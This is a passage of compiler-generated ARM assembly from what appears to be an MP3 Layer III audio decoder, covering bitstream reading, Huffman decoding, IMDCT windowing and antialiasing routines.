r3 ldr r3, .L182 ldr r3, [r3] add r3, r3, #12 ldr r3, [r3] orr r3, r2, r3 str r3, [fp, #-8] ldr r3, .L182+4 ldr r3, [r3] ldr r2, [fp, #-8] lsl r3, r2, r3 str r3, [fp, #-8] ldr r3, [fp, #-16] rsb r3, r3, #32 ldr r2, [fp, #-8] lsr r3, r2, r3 str r3, [fp, #-8] ldr r3, .L182 ldr r2, [r3] ldr r3, .L182+4 ldr r1, [r3] ldr r3, [fp, #-16] add r3, r1, r3 lsr r3, r3, #3 lsl r3, r3, #2 add r3, r2, r3 ldr r2, .L182 str r3, [r2] ldr r3, .L182+4 ldr r2, [r3] ldr r3, [fp, #-16] add r3, r2, r3 and r3, r3, #7 ldr r2, .L182+4 str r3, [r2] ldr r3, [fp, #-8] .L181: mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .L183: .align 2 .L182: .word g_main_data_ptr .word g_main_data_idx .size Get_Main_Bits, .-Get_Main_Bits .align 2 .syntax unified .arm .fpu softvfp .type Get_Main_Pos, %function Get_Main_Pos: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 ldr r3, .L186 ldr r3, [r3] mov r2, r3 ldr r3, .L186+4 sub r3, r2, r3 str r3, [fp, #-8] ldr r3, [fp, #-8] lsr r3, r3, #2 str r3, [fp, #-8] ldr r3, [fp, #-8] lsl r3, r3, #3 str r3, [fp, #-8] ldr r3, .L186+8 ldr r3, [r3] ldr r2, [fp, #-8] add r3, r2, r3 str r3, [fp, #-8] ldr r3, [fp, #-8] mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .L187: .align 2 .L186: .word g_main_data_ptr .word g_main_data_vec .word g_main_data_idx .size Get_Main_Pos, .-Get_Main_Pos .align 2 .syntax unified .arm .fpu softvfp .type Get_Side_Bits, %function Get_Side_Bits: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #20 str r0, [fp, #-16] ldr r3, .L190 ldr r3, [r3] ldr r3, [r3] lsl r2, r3, #24 ldr r3, .L190 ldr r3, [r3] add r3, r3, #4 ldr r3, [r3] lsl r3, r3, #16 orr r2, r2, r3 ldr r3, .L190 ldr r3, [r3] add r3, r3, #8 ldr r3, [r3] lsl r3, r3, #8 orr r2, r2, r3 ldr r3, .L190 ldr r3, [r3] add r3, r3, #12 ldr r3, [r3] orr r3, r2, r3 str r3, [fp, #-8] ldr r3, .L190+4 ldr r3, [r3] ldr r2, [fp, #-8] lsl r3, r2, r3 str r3, [fp, #-8] ldr r3, [fp, #-16] rsb r3, r3, #32 ldr r2, [fp, #-8] lsr r3, r2, r3 str r3, [fp, #-8] ldr r3, .L190 ldr r2, [r3] ldr r3, .L190+4 ldr r1, [r3] ldr r3, [fp, #-16] add r3, r1, r3 lsr r3, r3, #3 lsl r3, r3, #2 add r3, r2, r3 ldr r2, .L190 str r3, [r2] ldr r3, .L190+4 ldr r2, [r3] ldr r3, [fp, #-16] add r3, r2, r3 and r3, r3, #7 ldr r2, .L190+4 str r3, [r2] ldr r3, [fp, #-8] mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .L191: .align 2 .L190: .word side_info_ptr .word side_info_idx .size Get_Side_Bits, .-Get_Side_Bits .align 2 .syntax unified .arm .fpu softvfp .type Error, %function Error: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 str r0, [fp, #-8] str r1, [fp, #-12] ldr r0, [fp, #-8] bl strlen mov r2, r0 ldr r3, .L193 ldr r3, [r3] mov r1, #1 ldr r0, [fp, #-8] bl fwrite ldr r0, [fp, #-12] bl exit .L194: .align 2 .L193: .word stderr .size Error, .-Error .section .rodata .align 2 .LC14: .ascii "\012Couldn't read sideinfo %d bytes at pos %d\012\000" .text .align 2 .syntax unified .arm .fpu softvfp .type Get_Sideinfo, %function Get_Sideinfo: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, fp, lr} add fp, sp, #8 sub sp, sp, #12 str r0, [fp, #-16] ldr r1, .L198 ldr r0, [fp, #-16] bl Get_Bytes mov r3, r0 cmp r3, #0 beq .L196 ldr r3, .L198+4 ldr r4, [r3] bl Get_Filepos mov r3, r0 ldr r2, [fp, #-16] ldr r1, .L198+8 mov r0, r4 bl fprintf ldr r3, .L198+4 ldr r3, [r3] mov r1, r3 mov r0, #10 bl fputc b .L195 .L196: ldr r3, .L198+12 ldr r2, .L198 str r2, [r3] ldr r3, .L198+16 mov r2, #0 str r2, [r3] .L195: sub sp, fp, #8 @ sp needed pop {r4, fp, pc} .L199: .align 2 .L198: .word side_info_vec .word stderr .word .LC14 .word side_info_ptr .word side_info_idx .size Get_Sideinfo, .-Get_Sideinfo .section .rodata .align 2 .LC15: .ascii "Illegal Huff code in data. bleft = %d,point = %d. t" .ascii "ab = %d.\000" .text .align 2 .syntax unified .arm .fpu softvfp .type Huffman_Decode, %function Huffman_Decode: @ args = 4, pretend = 0, frame = 40 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #48 str r0, [fp, #-32] str r1, [fp, #-36] str r2, [fp, #-40] str r3, [fp, #-44] mov r3, #0 str r3, [fp, #-28] mov r3, #1 str r3, [fp, #-24] mov r3, #32 str r3, [fp, #-20] ldr r2, .L223 ldr r3, [fp, #-32] lsl r3, r3, #3 add r3, r2, r3 add r3, r3, #4 ldrh r3, [r3] str r3, [fp, #-16] ldr r2, .L223 ldr r3, [fp, #-32] lsl r3, r3, #3 add r3, r2, r3 ldrb r3, [r3, #6] @ zero_extendqisi2 str r3, [fp, #-12] ldr r2, .L223 ldr r3, [fp, #-32] lsl r3, r3, #3 add r3, r2, r3 add r3, r3, #4 ldrh r3, [r3] str r3, [fp, #-16] ldr r3, [fp, #-16] cmp r3, #0 bne .L201 ldr r3, [fp, #4] mov r2, #0 str r2, [r3] ldr r3, [fp, #4] ldr r2, [r3] ldr r3, [fp, #-44] str r2, [r3] ldr r3, [fp, #-44] ldr r2, [r3] ldr r3, [fp, #-40] str r2, [r3] ldr r3, [fp, #-40] ldr r2, [r3] ldr r3, [fp, #-36] str r2, [r3] mov r3, #0 b .L202 .L201: ldr r2, .L223 ldr r3, [fp, #-32] ldr r3, [r2, r3, lsl #3] str r3, [fp, #-8] .L211: ldr r3, [fp, #-28] lsl r3, r3, #1 ldr r2, [fp, #-8] add r3, r2, r3 ldrh r3, [r3] and r3, r3, #65280 cmp r3, #0 bne .L203 mov r3, #0 str r3, [fp, #-24] ldr r3, [fp, #-28] lsl r3, r3, #1 ldr r2, [fp, #-8] add r3, r2, r3 ldrh r3, [r3] lsr r3, r3, #4 lsl r3, r3, #16 lsr r3, r3, #16 and r2, r3, #15 ldr r3, [fp, #-36] str r2, [r3] ldr r3, [fp, #-28] lsl r3, r3, #1 ldr r2, [fp, #-8] add r3, r2, r3 ldrh r3, [r3] and r2, r3, #15 ldr r3, [fp, #-40] str r2, [r3] b .L204 .L203: bl Get_Main_Bit mov r3, r0 cmp r3, #0 beq .L209 b .L206 .L207: ldr r3, [fp, #-28] lsl r3, r3, #1 ldr r2, [fp, #-8] add r3, r2, r3 ldrh r3, [r3] and r3, r3, #255 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] .L206: ldr r3, [fp, #-28] lsl r3, r3, #1 ldr r2, [fp, #-8] add r3, r2, r3 ldrh r3, [r3] and r3, r3, #255 cmp r3, #249 bgt .L207 ldr r3, [fp, #-28] lsl r3, r3, #1 ldr r2, [fp, #-8] add r3, r2, r3 ldrh r3, [r3] and r3, r3, #255 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] b .L208 .L210: ldr r3, [fp, #-28] lsl r3, r3, #1 ldr r2, [fp, #-8] add r3, r2, r3 ldrh r3, [r3] lsr r3, r3, #8 lsl r3, r3, #16 lsr r3, r3, #16 mov r2, r3 ldr r3, [fp, #-28] add r3, r3, r2 str r3, [fp, #-28] .L209: ldr r3, [fp, #-28] lsl r3, r3, #1 ldr r2, [fp, #-8] add r3, r2, r3 ldrh r3, [r3] lsr r3, r3, #8 lsl r3, r3, #16 lsr r3, r3, #16 cmp r3, #249 bhi .L210 ldr r3, [fp, #-28] lsl r3, r3, #1 ldr r2, [fp, #-8] add r3, r2, r3 ldrh r3, [r3] lsr r3, r3, #8 lsl r3, r3, #16 lsr r3, r3, #16 mov r2, r3 ldr r3, [fp, #-28] add r3, r3, r2 str r3, [fp, #-28] .L208: ldr r3, [fp, #-20] sub r3, r3, #1 str r3, [fp, #-20] ldr r3, [fp, #-20] cmp r3, #0 beq .L204 ldr r2, [fp, #-28] ldr r3, [fp, #-16] cmp r2, r3 bcc .L211 .L204: ldr r3, [fp, #-24] cmp r3, #0 beq .L212 ldr r3, .L223+4 ldr r0, [r3] ldr r3, [fp, #-32] str r3, [sp] ldr r3, [fp, #-28] ldr r2, [fp, #-20] ldr r1, .L223+8 bl fprintf ldr r3, .L223+4 ldr r3, [r3] mov r1, r3 mov r0, #10 bl fputc ldr r3, [fp, #-40] mov r2, #0 str r2, [r3] ldr r3, [fp, #-40] ldr r2, [r3] ldr r3, [fp, #-36] str r2, [r3] .L212: ldr r3, [fp, #-32] cmp r3, #31 bls .L213 ldr r3, [fp, #-40] ldr r3, [r3] asr r3, r3, #3 and r2, r3, #1 ldr r3, [fp, #-44] str r2, [r3] ldr r3, [fp, #-40] ldr r3, [r3] asr r3, r3, #2 and r2, r3, #1 ldr r3, [fp, #4] str r2, [r3] ldr r3, [fp, #-40] ldr r3, [r3] asr r3, r3, #1 and r2, r3, #1 ldr r3, [fp, #-36] str r2, [r3] ldr r3, [fp, #-40] ldr r3, [r3] and r2, r3, #1 ldr r3, [fp, #-40] str r2, [r3] ldr r3, [fp, #-44] ldr r3, [r3] cmp r3, #0 ble .L214 bl Get_Main_Bit mov r3, r0 cmp r3, #1 bne .L214 ldr r3, [fp, #-44] ldr r3, [r3] rsb r2, r3, #0 ldr r3, [fp, #-44] str r2, [r3] .L214: ldr r3, [fp, #4] ldr r3, [r3] cmp r3, #0 ble .L215 bl Get_Main_Bit mov r3, r0 cmp r3, #1 bne .L215 ldr r3, [fp, #4] ldr r3, [r3] rsb r2, r3, #0 ldr r3, [fp, #4] str r2, [r3] .L215: ldr r3, [fp, #-36] ldr r3, [r3] cmp r3, #0 ble .L216 bl Get_Main_Bit mov r3, r0 cmp r3, #1 bne .L216 ldr r3, [fp, #-36] ldr r3, [r3] rsb r2, r3, #0 ldr r3, [fp, #-36] str r2, [r3] .L216: ldr r3, [fp, #-40] ldr r3, [r3] cmp r3, #0 ble .L217 bl Get_Main_Bit mov r3, r0 cmp r3, #1 bne .L217 ldr r3, [fp, #-40] ldr r3, [r3] rsb r2, r3, #0 ldr r3, [fp, #-40] str r2, [r3] b .L217 .L213: ldr r3, [fp, #-12] cmp r3, #0 beq .L218 ldr r3, [fp, #-36] ldr r3, [r3] cmp r3, #15 bne .L218 ldr r0, [fp, #-12] bl Get_Main_Bits mov r2, r0 ldr r3, [fp, #-36] ldr r3, [r3] add r3, r2, r3 mov r2, r3 ldr r3, [fp, #-36] str r2, [r3] .L218: ldr r3, [fp, #-36] ldr r3, [r3] cmp r3, #0 ble .L219 bl Get_Main_Bit mov r3, r0 cmp r3, #1 bne .L219 ldr r3, [fp, #-36] ldr r3, [r3] rsb r2, r3, #0 ldr r3, [fp, #-36] str r2, [r3] .L219: ldr r3, [fp, #-12] cmp r3, #0 beq .L220 ldr r3, [fp, #-40] ldr r3, [r3] cmp r3, #15 bne .L220 ldr r0, [fp, #-12] bl Get_Main_Bits mov r2, r0 ldr r3, [fp, #-40] ldr r3, [r3] add r3, r2, r3 mov r2, r3 ldr r3, [fp, #-40] str r2, [r3] .L220: ldr r3, [fp, #-40] ldr r3, [r3] cmp r3, #0 ble .L217 bl Get_Main_Bit mov r3, r0 cmp r3, #1 bne .L217 ldr r3, [fp, #-40] ldr r3, [r3] rsb r2, r3, #0 ldr r3, [fp, #-40] str r2, [r3] .L217: ldr r3, [fp, #-24] cmp r3, #0 beq .L221 mvn r3, #0 b .L202 .L221: mov r3, #0 .L202: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L224: .align 2 .L223: .word g_huffman_main .word stderr .word .LC15 .size Huffman_Decode, .-Huffman_Decode .align 2 .syntax unified .arm .fpu softvfp .type Set_Filepos, %function Set_Filepos: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 str r0, [fp, #-8] ldr r3, .L229 ldr r3, [r3] cmp r3, #0 beq .L228 ldr r3, .L229 ldr r3, [r3] ldr r1, [fp, #-8] mov r2, #0 mov r0, r3 bl fseek b .L225 .L228: nop .L225: sub sp, fp, #4 @ sp needed pop {fp, pc} .L230: .align 2 .L229: .word fp .size Set_Filepos, .-Set_Filepos .align 2 .syntax unified .arm .fpu softvfp .type Decode_L3_Init_Song, %function Decode_L3_Init_Song: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 ldr r3, .L232 mov r2, #1 str r2, [r3] ldr r3, .L232 ldr r3, [r3] ldr r2, .L232+4 str r3, [r2] ldr r3, .L232+8 mov r2, #0 str r2, [r3] nop add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .L233: .align 2 .L232: .word synth_init .word hsynth_init .word g_main_data_top .size Decode_L3_Init_Song, .-Decode_L3_Init_Song .global __aeabi_ui2d .global __aeabi_dadd .global __aeabi_dmul .global __aeabi_d2f .global __aeabi_dsub .global __aeabi_f2d .global __aeabi_ddiv .global __aeabi_fmul .global __aeabi_fadd .section .rodata .align 2 .LC16: .word __stack_chk_guard .text .align 2 .syntax unified .arm .fpu softvfp .type IMDCT_Win, %function IMDCT_Win: @ args = 0, pretend = 0, frame = 112 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, r9, fp, lr} add fp, sp, #28 sub sp, sp, #112 str r0, [fp, #-128] str r1, [fp, #-132] str r2, [fp, #-136] ldr r3, .L276 ldr r3, [r3] str r3, [fp, #-32] mov r3,#0 ldr r3, .L276+4 ldr r3, [r3] cmp r3, #0 beq .L235 mov r3, #0 str r3, [fp, #-124] b .L236 .L237: ldr r0, [fp, #-124] bl __aeabi_ui2d mov r2, #0 ldr r3, .L276+8 bl __aeabi_dadd mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 ldr r2, .L276+12 ldr r3, .L276+16 bl __aeabi_dmul mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl sin mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl __aeabi_d2f mov r2, r0 ldr r1, .L276+20 ldr r3, [fp, #-124] str r2, [r1, r3, lsl #2] @ float ldr r3, [fp, #-124] add r3, r3, #1 str r3, [fp, #-124] .L236: ldr r3, [fp, #-124] cmp r3, #35 bls .L237 mov r3, #0 str r3, [fp, #-124] b .L238 .L239: ldr r0, [fp, #-124] bl __aeabi_ui2d mov r2, #0 ldr r3, .L276+8 bl __aeabi_dadd mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 ldr r2, .L276+12 ldr r3, .L276+16 bl __aeabi_dmul mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl sin mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl __aeabi_d2f mov r2, r0 ldr r1, .L276+20 ldr r3, [fp, #-124] add r3, r3, #36 str r2, [r1, r3, lsl #2] @ float ldr r3, [fp, #-124] add r3, r3, #1 str r3, [fp, #-124] .L238: ldr r3, [fp, #-124] cmp r3, #17 bls .L239 mov r3, #18 str r3, [fp, #-124] b .L240 .L241: ldr r2, .L276+20 ldr r3, [fp, #-124] add r3, r3, #36 mov r1, #1065353216 str r1, [r2, r3, lsl #2] @ float ldr r3, [fp, #-124] add r3, r3, #1 str r3, [fp, #-124] .L240: ldr r3, [fp, #-124] cmp r3, #23 bls .L241 mov r3, #24 str r3, [fp, #-124] b .L242 .L243: ldr r0, [fp, #-124] bl __aeabi_ui2d mov r2, #0 ldr r3, .L276+8 bl __aeabi_dadd mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 mov r2, #0 ldr r3, .L276+24 bl __aeabi_dsub mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 ldr r2, .L276+28 ldr r3, .L276+32 bl __aeabi_dmul mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl sin mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl __aeabi_d2f mov r2, r0 ldr r1, .L276+20 ldr r3, [fp, #-124] add r3, r3, #36 str r2, [r1, r3, lsl #2] @ float ldr r3, [fp, #-124] add r3, r3, #1 str r3, [fp, #-124] .L242: ldr r3, [fp, #-124] cmp r3, #29 bls .L243 mov r3, #30 str r3, [fp, #-124] b .L244 .L245: ldr r2, .L276+20 ldr r3, [fp, #-124] add r3, r3, #36 mov r1, #0 str r1, [r2, r3, lsl #2] @ float ldr r3, [fp, #-124] add r3, r3, #1 str r3, [fp, #-124] .L244: ldr r3, [fp, #-124] cmp r3, #35 bls .L245 mov r3, #0 str r3, [fp, #-124] b .L246 .L247: ldr r0, [fp, #-124] bl __aeabi_ui2d mov r2, #0 ldr r3, .L276+8 bl __aeabi_dadd mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 ldr r2, .L276+28 ldr r3, .L276+32 bl __aeabi_dmul mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl sin mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl __aeabi_d2f mov r2, r0 ldr r1, .L276+20 ldr r3, [fp, #-124] add r3, r3, #72 str r2, [r1, r3, lsl #2] @ float ldr r3, [fp, #-124] add r3, r3, #1 str r3, [fp, #-124] .L246: ldr r3, [fp, #-124] cmp r3, #11 bls .L247 mov r3, #12 str r3, [fp, #-124] b .L248 .L249: ldr r2, .L276+20 ldr r3, [fp, #-124] add r3, r3, #72 mov r1, #0 str r1, [r2, r3, lsl #2] @ float ldr r3, [fp, #-124] add r3, r3, #1 str r3, [fp, #-124] .L248: ldr r3, [fp, #-124] cmp r3, #35 bls .L249 mov r3, #0 str r3, [fp, #-124] b .L250 .L251: ldr r2, .L276+20 ldr r3, [fp, #-124] add r3, r3, #108 mov r1, #0 str r1, [r2, r3, lsl #2] @ float ldr r3, [fp, #-124] add r3, r3, #1 str r3, [fp, #-124] .L250: ldr r3, [fp, #-124] cmp r3, #5 bls .L251 mov r3, #6 str r3, [fp, #-124] b .L252 .L253: ldr r0, [fp, #-124] bl __aeabi_ui2d mov r2, #0 ldr r3, .L276+8 bl __aeabi_dadd mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 mov r2, #0 ldr r3, .L276+36 bl __aeabi_dsub mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 ldr r2, .L276+28 ldr r3, .L276+32 bl __aeabi_dmul mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl sin mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl __aeabi_d2f mov r2, r0 ldr r1, .L276+20 ldr r3, [fp, #-124] add r3, r3, #108 str r2, [r1, r3, lsl #2] @ float ldr r3, [fp, #-124] add r3, r3, #1 str r3, [fp, #-124] .L252: ldr r3, [fp, #-124] cmp r3, #11 bls .L253 mov r3, #12 str r3, [fp, #-124] b .L254 .L255: ldr r2, .L276+20 ldr r3, [fp, #-124] add r3, r3, #108 mov r1, #1065353216 str r1, [r2, r3, lsl #2] @ float ldr r3, [fp, #-124] add r3, r3, #1 str r3, [fp, #-124] .L254: ldr r3, [fp, #-124] cmp r3, #17 bls .L255 mov r3, #18 str r3, [fp, #-124] b .L256 .L257: ldr r0, [fp, #-124] bl __aeabi_ui2d mov r2, #0 ldr r3, .L276+8 bl __aeabi_dadd mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 ldr r2, .L276+12 ldr r3, .L276+16 bl __aeabi_dmul mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl sin mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl __aeabi_d2f mov r2, r0 ldr r1, .L276+20 ldr r3, [fp, #-124] add r3, r3, #108 str r2, [r1, r3, lsl #2] @ float ldr r3, [fp, #-124] add r3, r3, #1 str r3, [fp, #-124] .L256: ldr r3, [fp, #-124] cmp r3, #35 bls .L257 ldr r3, .L276+4 mov r2, #0 str r2, [r3] .L235: mov r3, #0 str r3, [fp, #-124] b .L258 .L259: ldr r3, [fp, #-124] lsl r3, r3, #2 ldr r2, [fp, #-132] add r3, r2, r3 mov r2, #0 str r2, [r3] @ float ldr r3, [fp, #-124] add r3, r3, #1 str r3, [fp, #-124] .L258: ldr r3, [fp, #-124] cmp r3, #35 bls .L259 mov r3, #0 str r3, [fp, #-124] b .L260 .L261: ldr r3, [fp, #-124] lsl r3, r3, #2 ldr r2, [fp, #-128] add r3, r2, r3 ldr r2, [r3] @ float ldr r3, [fp, #-124] lsl r3, r3, #2 sub r1, fp, #28 add r3, r1, r3 str r2, [r3, #-76] @ float ldr r3, [fp, #-124] add r3, r3, #1 str r3, [fp, #-124] .L260: ldr r3, [fp, #-124] cmp r3, #17 bls .L261 ldr r3, [fp, #-136] cmp r3, #2 bne .L262 mov r3, #12 str r3, [fp, #-108] mov r3, #0 str r3, [fp, #-124] b .L263 .L268: mov r3, #0 str r3, [fp, #-116] b .L264 .L267: mov r3, #0 str r3, [fp, #-112] @ float mov r3, #0 str r3, [fp, #-120] b .L265 .L266: ldr r0, [fp, #-112] @ float bl __aeabi_f2d mov r4, r0 mov r5, r1 ldr r2, [fp, #-120] mov r3, r2 lsl r3, r3, #1 add r2, r3, r2 ldr r3, [fp, #-124] add r3, r2, r3 lsl r3, r3, #2 sub r2, fp, #28 add r3, r2, r3 ldr r3, [r3, #-76] @ float mov r0, r3 bl __aeabi_f2d mov r6, r0 mov r7, r1 ldr r3, [fp, #-108] lsl r3, r3, #1 mov r0, r3 bl __aeabi_ui2d mov r2, r0 mov r3, r1 ldr r0, .L276+40 ldr r1, .L276+44 bl __aeabi_ddiv mov r2, r0 mov r3, r1 mov r8, r2 mov r9, r3 ldr r3, [fp, #-116] lsl r2, r3, #1 ldr r3, [fp, #-108] lsr r3, r3, #1 add r3, r2, r3 add r3, r3, #1 mov r0, r3 bl __aeabi_ui2d mov r2, r0 mov r3, r1 mov r0, r8 mov r1, r9 bl __aeabi_dmul mov r2, r0 mov r3, r1 mov r8, r2 mov r9, r3 ldr r3, [fp, #-120] lsl r3, r3, #1 add r3, r3, #1 mov r0, r3 bl __aeabi_ui2d mov r2, r0 mov r3, r1 mov r0, r8 mov r1, r9 bl __aeabi_dmul mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl cos mov r2, r0 mov r3, r1 mov r0, r6 mov r1, r7 bl __aeabi_dmul mov r2, r0 mov r3, r1 mov r0, r4 mov r1, r5 bl __aeabi_dadd mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl __aeabi_d2f mov r3, r0 str r3, [fp, #-112] @ float ldr r3, [fp, #-120] add r3, r3, #1 str r3, [fp, #-120] .L265: ldr r3, [fp, #-108] lsr r3, r3, #1 ldr r2, [fp, #-120] cmp r2, r3 bcc .L266 ldr r2, [fp, #-124] mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r3, r3, #1 mov r2, r3 ldr r3, [fp, #-116] add r3, r2, r3 add r3, r3, #6 lsl r3, r3, #2 ldr r2, [fp, #-132] add r3, r2, r3 ldr r5, [r3] @ float ldr r1, .L276+20 ldr r2, [fp, #-136] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 ldr r2, [fp, #-116] add r3, r3, r2 ldr r3, [r1, r3, lsl #2] @ float ldr r1, [fp, #-112] @ float mov r0, r3 bl __aeabi_fmul mov r3, r0 mov r1, r3 ldr r2, [fp, #-124] mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r3, r3, #1 mov r2, r3 ldr r3, [fp, #-116] add r3, r2, r3 add r3, r3, #6 lsl r3, r3, #2 ldr r2, [fp, #-132] add r4, r2, r3 mov r0, r5 bl __aeabi_fadd mov r3, r0 str r3, [r4] @ float ldr r3, [fp, #-116] add r3, r3, #1 str r3, [fp, #-116] .L264: ldr r2, [fp, #-116] ldr r3, [fp, #-108] cmp r2, r3 bcc .L267 ldr r3, [fp, #-124] add r3, r3, #1 str r3, [fp, #-124] .L263: ldr r3, [fp, #-124] cmp r3, #2 bls .L268 b .L275 .L262: mov r3, #36 str r3, [fp, #-108] mov r3, #0 str r3, [fp, #-116] b .L270 .L273: mov r3, #0 str r3, [fp, #-112] @ float mov r3, #0 str r3, [fp, #-120] b .L271 .L272: ldr r0, [fp, #-112] @ float bl __aeabi_f2d mov r4, r0 mov r5, r1 ldr r3, [fp, #-120] lsl r3, r3, #2 ldr r2, [fp, #-128] add r3, r2, r3 ldr r3, [r3] @ float mov r0, r3 bl __aeabi_f2d mov r6, r0 mov r7, r1 ldr r3, [fp, #-108] lsl r3, r3, #1 mov r0, r3 bl __aeabi_ui2d mov r2, r0 mov r3, r1 ldr r0, .L276+40 ldr r1, .L276+44 bl __aeabi_ddiv mov r2, r0 mov r3, r1 mov r8, r2 mov r9, r3 ldr r3, [fp, #-116] lsl r2, r3, #1 ldr r3, [fp, #-108] lsr r3, r3, #1 add r3, r2, r3 add r3, r3, #1 mov r0, r3 bl __aeabi_ui2d mov r2, r0 mov r3, r1 mov r0, r8 mov r1, r9 bl __aeabi_dmul mov r2, r0 mov r3, r1 mov r8, r2 mov r9, r3 ldr r3, [fp, #-120] lsl r3, r3, #1 add r3, r3, #1 mov r0, r3 bl __aeabi_ui2d mov r2, r0 mov r3, r1 mov r0, r8 mov r1, r9 bl __aeabi_dmul mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl cos mov r2, r0 mov r3, r1 mov r0, r6 mov r1, r7 bl __aeabi_dmul mov r2, r0 mov r3, r1 mov r0, r4 mov r1, r5 bl __aeabi_dadd mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl __aeabi_d2f mov r3, r0 str r3, [fp, #-112] @ float ldr r3, [fp, #-120] add r3, r3, #1 str r3, [fp, #-120] .L271: ldr r3, [fp, #-108] lsr r3, r3, #1 ldr r2, [fp, #-120] cmp r2, r3 bcc .L272 ldr r1, .L276+20 ldr r2, [fp, #-136] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 ldr r2, [fp, #-116] add r3, r3, r2 ldr r0, [r1, r3, lsl #2] @ float ldr r3, [fp, #-116] lsl r3, r3, #2 ldr r2, [fp, #-132] add r4, r2, r3 ldr r1, [fp, #-112] @ float bl __aeabi_fmul mov r3, r0 str r3, [r4] @ float ldr r3, [fp, #-116] add r3, r3, #1 str r3, [fp, #-116] .L270: ldr r2, [fp, #-116] ldr r3, [fp, #-108] cmp r2, r3 bcc .L273 .L275: nop ldr r3, .L276 ldr r2, [r3] ldr r3, [fp, #-32] eors r2, r3, r2 mov r3, #0 beq .L274 bl __stack_chk_fail .L274: sub sp, fp, #28 @ sp needed pop {r4, r5, r6, r7, r8, r9, fp, pc} .L277: .align 2 .L276: .word .LC16 .word init.7571 .word 1071644672 .word 1256670343 .word 1068914456 .word g_imdct_win.7570 .word 1077018624 .word 942502757 .word 1070645586 .word 1075314688 .word 1413754136 .word 1074340347 .size IMDCT_Win, .-IMDCT_Win .global __aeabi_fsub .align 2 .syntax unified .arm .fpu softvfp .type L3_Antialias, %function L3_Antialias: @ args = 0, pretend = 0, frame = 40 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, fp, lr} add fp, sp, #8 sub sp, sp, #44 str r0, [fp, #-48] str r1, [fp, #-52] ldr r1, .L288 ldr r3, [fp, #-48] lsl r2, r3, #1 ldr r3, [fp, #-52] add r3, r2, r3 add r3, r3, #26 ldr r3, [r1, r3, lsl #2] cmp r3, #1 bne .L279 ldr r1, .L288 ldr r3, [fp, #-48] lsl r2, r3, #1 ldr r3, [fp, #-52] add r3, r2, r3 add r3, r3, #30 ldr r3, [r1, r3, lsl #2] cmp r3, #2 bne .L279 ldr r1, .L288 ldr r3, [fp, #-48] lsl r2, r3, #1 ldr r3, [fp, #-52] add r3, r2, r3 add r3, r3, #34 ldr r3, [r1, r3, lsl #2] cmp r3, #0 beq .L287 .L279: ldr r1, .L288 ldr r3, [fp, #-48] lsl r2, r3, #1 ldr r3, [fp, #-52] add r3, r2, r3 add r3, r3, #26 ldr r3, [r1, r3, lsl #2] cmp r3, #1 bne .L281 ldr r1, .L288 ldr r3, [fp, #-48] lsl r2, r3, #1 ldr r3, [fp, #-52] add r3, r2, r3 add r3, r3, #30 ldr r3, [r1, r3, lsl #2] cmp r3, #2 bne .L281 ldr r1, .L288 ldr r3, [fp, #-48] lsl r2, r3, #1 ldr r3, [fp, #-52] add r3, r2, r3 add r3, r3, #34 ldr r3, [r1, r3, lsl #2] cmp r3, #1 bne .L281 mov r3, #2 b .L282 .L281: mov r3, #32 .L282: str r3, [fp, #-32] mov r3, #1 str r3, [fp, #-40] b .L283 .L286: mov r3, #0 str r3, [fp, #-36] b .L284 .L285: ldr r2, [fp, #-40] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 